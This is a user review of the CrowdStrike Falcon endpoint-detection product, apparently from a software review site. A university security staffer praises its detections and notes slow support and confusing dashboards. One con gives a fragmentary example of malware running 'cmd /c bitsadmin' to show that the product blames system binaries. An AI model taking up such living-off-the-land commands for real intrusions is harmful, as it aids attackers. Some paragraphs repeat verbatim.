A Comprehensive Look at the Fabulous EDR CrowdStrike Falcon
March 19, 2024
A Comprehensive Look at the Fabulous EDR CrowdStrike Falcon
Score 10 out of 10
Vetted Review
Verified User
Software Version
Falcon Enterprise
Modules Used
- Falcon Insight
- Falcon Sandbox
- Falcon Prevent
- Falcon Intelligence
- Falcon Search Engine
Overall Satisfaction with CrowdStrike Falcon
I use CrowdStrike Falcon as the main source of monitoring threats originating from operating systems used by our servers, workstations, staff laptops and guest users machines.
Our organization being a university where thousands of students and hundreds of staff turn up daily, puts our critical assets at risk of being compromised by an insider. CrowdStrike Falcon helps us identify the source of a threat accurately, blocks the triggering file or script before it can cause damage. The AI / ML based detections are very helpful because they catch threats that other vendors may fail at. The scope of our use case is endpoint monitoring and threat management.
Our organization being a university where thousands of students and hundreds of staff turn up daily, puts our critical assets at risk of being compromised by an insider. CrowdStrike Falcon helps us identify the source of a threat accurately, blocks the triggering file or script before it can cause damage. The AI / ML based detections are very helpful because they catch threats that other vendors may fail at. The scope of our use case is endpoint monitoring and threat management.
- AI / ML based malicious activity detections
- Detection information presented clearly and concisely on dashboard
- Easy filtering of detections on hostname, detection name, severity, date, time, hash, technique etc
- traces full process chain instead of just showing the source file or script which really helps in tracing the main security concern of machine
- If some malicious app uses microsoft's signed binary like onedrive, cmd, wscript CrowdStrike would tag the microsoft binary as malicious and fails to provide the actual file that tried to execute these.
- For example if a
- malware.exe tries to run this command
- cmd /c bitsadmin
- CrowdStrike would tag cmd or bitsadmin as malicious and does not mention malware.exe at all sometimes
- There are two different dashboards (updated and deprecated) which causes confusion among my team, all must be on same page and use single dashboard.
- Support is very slow in responding to problems and depend on automated bots which really frustrates when a major issue arises.
- Made our organization more secure by ensuring threats are blocked instantly and tagged clearly for us to take action
- Increase confidence in our security after recent data leaks
- Business increased after clients were ensured their data protection and security is top notch
Our users frequently installed cracked software and torrents, after CrowdStrike Falcon this has been completely eliminated since most of these are backdoored and malicious so CrowdStrike Falcon would not let them install or even download these. We also made use of exclusion module to exclude some machines from detections, like our Programming labs where students learn to code and may need to download code or program which may not always pass CrowdStrike. Most of these exclusions are hash based.
We have been able to successfully reduce our attack surface area, when installed in first 90 days we had several thousands detections now it has been reduced to 900-1000
It offers scalability, as a university we grow each year as more students enroll and we require more staff, as our needs grow and evolve, Falcon grows with us. The process is also very simple, just generate an agent based on target operating system and install it, this is helped us a lot to achieve our goal of giving quality education to students.
- We integrated Falcon with our SIEM solution temporarily
- Implemented / enforced partial information security policy through Falcon
- Detected C2 in our internal network by using Threat Actors library in crowdstrike, where they give information about most dangerous hacking groups
It was the easiest to deploy and manage, while the dashboard was also very clear and precise in terms of useful information.
Another major reason in selection CrowdStrike Falcon was its AI and ML detection capabilities which really impressed us during evaluation. Other tools analysed were not too bad either but seemed complex to operate and use.
Another major reason in selection CrowdStrike Falcon was its AI and ML detection capabilities which really impressed us during evaluation. Other tools analysed were not too bad either but seemed complex to operate and use.
Do you think CrowdStrike Falcon delivers good value for the price?
Yes
Are you happy with CrowdStrike Falcon's feature set?
Yes
Did CrowdStrike Falcon live up to sales and marketing promises?
Yes
Did implementation of CrowdStrike Falcon go as expected?
Yes
Would you buy CrowdStrike Falcon again?
Yes